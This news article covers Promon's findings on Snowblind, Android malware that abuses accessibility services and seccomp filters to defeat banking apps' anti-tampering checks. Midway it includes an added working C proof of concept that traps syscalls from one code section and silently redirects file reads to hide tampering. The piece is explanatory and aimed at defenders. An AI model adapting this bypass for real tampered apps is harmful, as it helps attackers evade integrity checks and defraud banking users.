A novel malware strain is being used to target banking customers in Southeast Asia, leading to financial losses and fraud, according to Promon research.
The newly discovered malware, dubbed Snowblind, uses a powerful and “never-before-seen” technique to disable Android banking apps’ ability to determine if they have been maliciously modified, thereby avoiding detection.
Snowblind abuses Android accessibility services, features of the operating system designed to help users with disabilities use their devices more effectively.
These services have extensive permissions to interact with and modify app interfaces, allowing them to read the contents of the screen, input text and perform actions on behalf of the user.
Snowblind abuses these services to read sensitive information, navigate the device or control apps, and bypass security measures by automating interactions that would normally require the user, according to Promon.
This approach enables threat actors to perform a number of malicious activities. These include:
- Stealing users’ login credentials
- Hijacking a user’s banking session to make unauthorized transactions
- Disabling app security features such as two-factor authentication (2FA) or biometric verification
- Exfiltrating sensitive personally identifiable information (PII) and transaction data
The malware is effective on all modern Android devices and has been observed specifically targeting banking apps.
How Snowblind Malware Avoids Detection
Snowblind avoids detection by modifying the app so that it can no longer notice either the modification itself or the presence of accessibility services.
To do so, it abuses seccomp, a Linux kernel feature that restricts which system calls (the requests a process makes to the kernel) a process is allowed to make.
The malware bypasses the app’s anti-tampering code by installing its own seccomp filter in the process it is loaded into.
The filter instructs the kernel not to execute selected system calls but to deliver a SIGSYS signal to the process instead.
Snowblind also installs a signal handler for SIGSYS, which lets it inspect each intercepted call and alter its arguments or result, so the app’s checks see only what the malware wants them to see.
Trapping every system call would generate so many signals that the app would noticeably slow down, so the filter also checks where each call came from.
It instructs the kernel to generate the signal only if the call was made from the library that implements the anti-tampering mechanism.
Promon stated that the attack is particularly powerful because it goes beyond defeating one anti-tampering mechanism: it can trace and manipulate any code that relies on system calls, even code that issues the system calls itself rather than through a library. That denies such mechanisms the ability to check the integrity of the app’s code and files and to detect tampering.
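To make the mechanism described above concrete, here is an added example for Linux/glibc on x86_64 (it is not Promon’s analysis or Snowblind’s code, and it needs GCC or Clang with GNU ld or lld). It builds a seccomp-bpf filter that traps openat(2) only when the syscall instruction sits inside a text section standing in for the anti-tampering library, installs a SIGSYS handler that swaps the path argument for the untouched original before re-issuing the call, and checks that a libc open() from anywhere else is left alone. The section name `antitamper_text`, the temporary file names and the `SIGNED-APK`/`PATCHED-APK` contents are constructed for the demo.

```c
/* Added example, not Promon's or Snowblind's code. Assumes Linux/glibc on x86_64 with GCC or
 * Clang and GNU ld or lld. The filter traps openat(2) with SIGSYS only when the syscall
 * instruction lies in one text section; the handler swaps the path and re-issues the call. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <signal.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <ucontext.h>
#include <unistd.h>

extern const char __start_antitamper_text[], __stop_antitamper_text[]; /* emitted by GNU ld/lld */
enum { RSI = 9, RDX = 12, RAX = 13 };                 /* glibc x86_64 gregs[] indices (REG_*) */
static char original_apk[] = "/tmp/orig_apk_XXXXXX";  /* constructed sample files, see run_demo */
static char modified_apk[] = "/tmp/mod_apk_XXXXXX";

/* Raw openat(2) in its own section; the filter's address range is exactly this section. */
__attribute__((noinline, section("antitamper_text")))
static long raw_openat(const char *path, long flags)
{
    long ret;
    register long r10 __asm__("r10") = 0;                           /* mode argument */
    __asm__ volatile("syscall" : "=a"(ret) : "a"((long)__NR_openat), "D"((long)AT_FDCWD),
                     "S"(path), "d"(flags), "r"(r10) : "rcx", "r11", "memory");
    return ret;
}

/* Allow every syscall except openat issued from [lo, hi), which traps to SIGSYS. The 64-bit
 * instruction_pointer is compared as two 32-bit halves. (A real filter also checks .arch.) */
static unsigned short build_filter(struct sock_filter *out, unsigned long lo, unsigned long hi)
{
    const unsigned ip_lo = offsetof(struct seccomp_data, instruction_pointer), ip_hi = ip_lo + 4;
    const struct sock_filter prog[] = {
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, nr)),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_openat, 1, 0),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),                  /* 2: other syscall */
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, ip_hi),                     /* 3: ip >= lo ? */
        BPF_JUMP(BPF_JMP | BPF_JGT | BPF_K, (unsigned)(lo >> 32), 3, 0),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, (unsigned)(lo >> 32), 0, 8),
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, ip_lo),
        BPF_JUMP(BPF_JMP | BPF_JGE | BPF_K, (unsigned)lo, 0, 6),
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, ip_hi),                     /* 8: ip < hi ? */
        BPF_JUMP(BPF_JMP | BPF_JGE | BPF_K, (unsigned)(hi >> 32), 0, 3),
        BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, (unsigned)(hi >> 32), 0, 3),
        BPF_STMT(BPF_LD | BPF_W | BPF_ABS, ip_lo),
        BPF_JUMP(BPF_JMP | BPF_JGE | BPF_K, (unsigned)hi, 1, 0),
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_TRAP),                   /* 13: from the library */
        BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),                  /* 14: from anywhere else */
    };
    memcpy(out, prog, sizeof prog);
    return sizeof prog / sizeof prog[0];
}

/* SIGSYS handler: the kernel skipped the openat; we run a substitute and put its result in RAX. */
static void on_sigsys(int sig, siginfo_t *si, void *ctx)
{
    long long *regs = ((ucontext_t *)ctx)->uc_mcontext.gregs;
    if (sig != SIGSYS || si->si_syscall != __NR_openat) return;
    const char *path = (const char *)regs[RSI];
    const char *target = strcmp(path, modified_apk) == 0 ? original_apk : path;
    long r = syscall(__NR_openat, AT_FDCWD, target, (long)regs[RDX], 0);  /* libc: outside the range */
    regs[RAX] = r == -1 ? -errno : r;
}

static int install_filter(void)                    /* unprivileged; cannot be removed afterwards */
{
    struct sock_filter insns[16];
    struct sock_fprog prog = { 0, insns };
    struct sigaction sa; memset(&sa, 0, sizeof sa);
    sa.sa_sigaction = on_sigsys; sa.sa_flags = SA_SIGINFO;
    prog.len = build_filter(insns, (unsigned long)__start_antitamper_text, (unsigned long)__stop_antitamper_text);
    if (sigaction(SIGSYS, &sa, NULL) == -1 || prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) == -1) return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
}

static int file_says(long fd, const char *expect)   /* read a freshly opened file, compare, close */
{
    char buf[16] = {0};
    if (fd < 0) return 0;
    ssize_t n = read((int)fd, buf, sizeof buf - 1); close((int)fd);
    return n > 0 && strcmp(buf, expect) == 0;
}

/* 2: bypass behaved as described; 1: this sandbox refuses seccomp filters; 0: something is wrong. */
int run_demo(void)
{
    int fd = mkstemp(original_apk); if (fd < 0 || write(fd, "SIGNED-APK", 10) != 10) return 0; close(fd);
    fd = mkstemp(modified_apk);     if (fd < 0 || write(fd, "PATCHED-APK", 11) != 11) return 0; close(fd);
    int before = file_says(raw_openat(modified_apk, O_RDONLY), "SIGNED-APK");   /* no filter: tampering seen */
    int rc = install_filter();
    int after = rc == 0 && file_says(raw_openat(modified_apk, O_RDONLY), "SIGNED-APK"); /* trapped, redirected */
    int other = rc == 0 && file_says(open(modified_apk, O_RDONLY), "PATCHED-APK");     /* libc open: untouched */
    unlink(original_apk); unlink(modified_apk);
    return rc != 0 ? 1 : (!before && after && other) ? 2 : 0;
}

int main(void) { return run_demo() == 0; }
```

Two details carry the page’s argument. `raw_openat` issues the `syscall` instruction itself rather than through libc, and it is still trapped, because the filter keys on the instruction pointer, not on which library made the call. And the libc `open()` in `other` reads the patched file unchanged, which is the “only signal for the anti-tampering library” optimisation: every other caller pays nothing. A filter installed this way also cannot be removed by the process afterwards.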
A Novel Malware Strain
The researchers noted that Snowblind is more sophisticated than other well-known techniques for bypassing anti-tampering code, most of which developers can mitigate with obfuscation and strong in-memory integrity checking of their code.
The approach used in Snowblind has not been seen in any public tools. The researchers have observed a few GitHub repositories implementing “something in this direction” and some blog posts describing similar methods, all of them apparently in Chinese, but none appear to be as refined as Snowblind’s implementation.
Promon has urged app developers to protect against this technique before it is used more widely by threat actors.